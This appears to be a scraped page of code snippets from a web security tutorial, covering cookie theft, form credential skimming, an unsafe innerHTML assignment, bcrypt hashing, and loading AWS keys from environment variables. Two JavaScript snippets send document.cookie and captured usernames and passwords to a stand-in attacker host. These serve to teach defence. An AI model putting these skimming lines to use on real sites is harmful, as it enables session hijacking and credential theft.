This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// capture the cookies | |
const cookie = document.cookie; | |
// send the cookies to the attacker | |
fetch('https://evil-website.com/cookie-capture', { | |
data: cookie | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// add an event listener to the form | |
const form_element = document.getElementsByTagName('form')[0]; | |
form_element.addEventListener('submit', () => { | |
// capture the username and password from the form | |
const username = document.getElementById('username_input').value; | |
const password = document.getElementById('password_input').value; | |
// send the username and password to the attacker | |
fetch(`https://evil-website.com/password-capture/?u=${username}&p=${password}`); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const username = document.getElementById('username_input'); | |
const username_box = document.getElementById('username_box'); | |
user_name_box.innerHTML = username; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import bcrypt | |
# this will create the hash that you need to store in your database | |
def create_bcrypt_hash(password): | |
# convert the string to bytes | |
password_bytes = password.encode() | |
# generate a salt | |
salt = bcrypt.gensalt(14) | |
# calculate a hash as bytes | |
password_hash_bytes = bcrypt.hashpw(password_bytes, salt) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def login(username, password): | |
user = Users.get(username) # fetch the user record from the database | |
# if no user matches the username, don't log them in | |
if not user: | |
return False | |
# hash the supplied password | |
supplied_hash = some_hash_function(password) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import s3_bucket as S3 | |
import os | |
# get your key data from environment variables | |
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
# initialize the package | |
S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import s3_bucket as S3 | |
import os | |
# get your key data from environment variables | |
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
# initialize the package | |
S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
try: | |
bucket = S3.Bucket('my-bucket-name') | |
data, metadata = bucket.get('some key') | |
except S3.Exceptions.NoSuchBucket as e: | |
# some error handling here | |
pass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bucket = S3.Bucket('your bucket name') | |
#example | |
bucket = S3.Bucket('my-website-data') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import s3_bucket as S3 | |
import os | |
# get your key data from environment variables | |
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
# initialize the package | |
S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |